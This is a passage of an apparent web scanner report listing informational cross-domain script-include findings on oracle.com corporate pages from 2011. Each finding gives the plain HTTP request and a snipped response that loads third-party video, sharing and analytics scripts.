Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35759105706347886,0:1)
Date: Tue, 06 Sep 2011 16:15:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.232. http://www.oracle.com/us/corporate/analystrelations/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/analystrelations/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/analystrelations/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=40288174477304969,0:1)
Date: Tue, 06 Sep 2011 16:15:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.233. http://www.oracle.com/us/corporate/blogs/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/blogs/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/blogs/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41091191640088127,0:1)
Date: Tue, 06 Sep 2011 16:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.234. http://www.oracle.com/us/corporate/careers/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/careers/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/careers/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=237;ecid=41098660587310801,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.235. http://www.oracle.com/us/corporate/citizenship/community/038108.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/citizenship/community/038108.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/citizenship/community/038108.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099369257948753,0:1)
Date: Tue, 06 Sep 2011 16:15:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.236. http://www.oracle.com/us/corporate/citizenship/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/citizenship/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js
http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /us/corporate/citizenship/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41181377363497473,0:1)
Date: Tue, 06 Sep 2011 16:15:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.237. http://www.oracle.com/us/corporate/customers/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/customers/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/customers/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=5;ecid=41109874747082182,0:1)
Date: Tue, 06 Sep 2011 16:13:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.238. http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/customers/oracle-users-groups-192206.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/customers/oracle-users-groups-192206.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=65;ecid=41091264654533117,0:1)
Date: Tue, 06 Sep 2011 16:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.239. http://www.oracle.com/us/corporate/features/engineered-173370.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/features/engineered-173370.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/features/engineered-173370.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099957668475831,0:1)
Date: Tue, 06 Sep 2011 16:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.240. http://www.oracle.com/us/corporate/history/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/history/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/history/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008810809975844,0:1)
Date: Tue, 06 Sep 2011 16:15:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.241. http://www.oracle.com/us/corporate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35651503889036777,0:1)
Date: Tue, 06 Sep 2011 16:15:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.242. http://www.oracle.com/us/corporate/innovation/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/innovation/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/innovation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099579711348325,0:1)
Date: Tue, 06 Sep 2011 16:15:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.243. http://www.oracle.com/us/corporate/insight/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/insight/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/insight/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008621831412329,0:1)
Date: Tue, 06 Sep 2011 16:15:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.244. http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/investor-relations/corporate-governance-176724.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/investor-relations/corporate-governance-176724.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41099094380038254,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.245. http://www.oracle.com/us/corporate/investor-relations/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/investor-relations/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/investor-relations/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41098991300821785,0:1)
Date: Tue, 06 Sep 2011 16:15:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.246. http://www.oracle.com/us/corporate/oracle-racing-070515.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/oracle-racing-070515.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/oracle-racing-070515.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008999788539688,0:1)
Date: Tue, 06 Sep 2011 16:15:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.247. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/press/BoardofDirectors/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/press/BoardofDirectors/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35660476075859156,0:1)
Date: Tue, 06 Sep 2011 16:13:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.248. http://www.oracle.com/us/corporate/press/Executives/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/press/Executives/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/press/Executives/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41172984997271740,0:1)
Date: Tue, 06 Sep 2011 16:13:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.249. http://www.oracle.com/us/corporate/press/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/press/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/press/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=35711371439084667,0:1)
Date: Tue, 06 Sep 2011 16:13:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.250. http://www.oracle.com/us/corporate/pricing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/pricing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/pricing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=94;ecid=35995535065858112,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.251. http://www.oracle.com/us/corporate/pricing/price-lists/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/pricing/price-lists/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/corporate/pricing/price-lists/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=8;ecid=41143019010217386,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
